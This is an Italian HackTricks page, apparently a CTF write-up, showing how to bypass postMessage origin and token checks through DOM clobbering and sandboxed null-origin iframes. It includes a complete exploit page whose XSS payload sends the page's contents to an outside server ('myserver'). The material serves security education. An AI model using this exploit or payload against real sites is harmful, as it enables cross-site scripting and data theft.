mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-02 01:19:45 +00:00
6.4 KiB
6.4 KiB
Bypassing SOP con Iframes - 2
Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!
- Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? O vuoi avere accesso all'ultima versione di PEASS o scaricare HackTricks in PDF? Controlla i PACCHETTI DI ABBONAMENTO!
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguimi su Twitter 🐦@carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR al repo hacktricks e al repo hacktricks-cloud.
Iframes in SOP-2
Nella soluzione per questa sfida, @Strellic_ propone un metodo simile alla sezione precedente. Vediamolo.
In questa sfida l'attaccante deve eludere questo:
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
Se lo fa, può inviare un postmessage con contenuto HTML che verrà scritto nella pagina con innerHTML
senza sanificazione (XSS).
Il modo per aggirare il primo controllo è rendere window.calc.contentWindow
uguale a undefined
e e.source
uguale a null
:
window.calc.contentWindow
è in realtàdocument.getElementById("calc")
. Puoi sovrascriveredocument.getElementById
con<img name=getElementById />
(nota che l'API Sanitizer -qui- non è configurata per proteggere contro attacchi di sovrascrittura del DOM nel suo stato predefinito).- Pertanto, puoi sovrascrivere
document.getElementById("calc")
con<img name=getElementById /><div id=calc></div>
. Quindi,window.calc
saràundefined
. - Ora, abbiamo bisogno che
e.source
siaundefined
onull
(perché viene utilizzato==
invece di===
,null == undefined
èTrue
). Ottenere questo è "facile". Se crei un iframe e invii un postMessage da esso e immediatamente rimuovi l'iframe,e.origin
sarànull
. Controlla il seguente codice
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null
Per aggirare il secondo controllo sul token, è possibile inviare il token
con valore null
e impostare il valore di window.token
su undefined
:
- L'invio del
token
tramite postMessage con valorenull
è banale. window.token
viene richiamato dalla funzionegetCookie
che utilizzadocument.cookie
. Si noti che qualsiasi accesso adocument.cookie
nelle pagine di originenull
genera un errore. Ciò farà sì chewindow.token
abbia valoreundefined
.
La soluzione finale proposta da @terjanq è la seguente:
<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');
function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`
document.body.appendChild(ifr);
function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}
// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
- Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? o vuoi avere accesso all'ultima versione di PEASS o scaricare HackTricks in PDF? Controlla i PACCHETTI DI ABBONAMENTO!
- Scopri La Famiglia PEASS, la nostra collezione di esclusive NFT
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguimi su Twitter 🐦@carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR al repo hacktricks e al repo hacktricks-cloud.